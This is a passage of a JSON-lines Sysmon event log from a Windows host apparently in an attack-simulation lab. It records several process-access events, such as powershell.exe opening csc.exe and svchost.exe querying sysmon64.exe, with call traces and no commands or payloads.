05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4865,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.499\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001016A60700}\r\nSourceProcessId: 3396\r\nSourceThreadId: 4784\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-0010C9B90700}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447AB68F)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.499","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001016A60700}","SourceProcessId":"3396","SourceThreadId":"4784","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-0010C9B90700}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447AB68F)","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4866,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.499\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-0010C9B90700}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.499","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-0010C9B90700}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4867,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.499\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.499","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4868,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.499\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.499","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4869,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.499\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.499","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4870,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.499\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.499","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4871,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.499\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.499","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4872,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.499\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.499","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
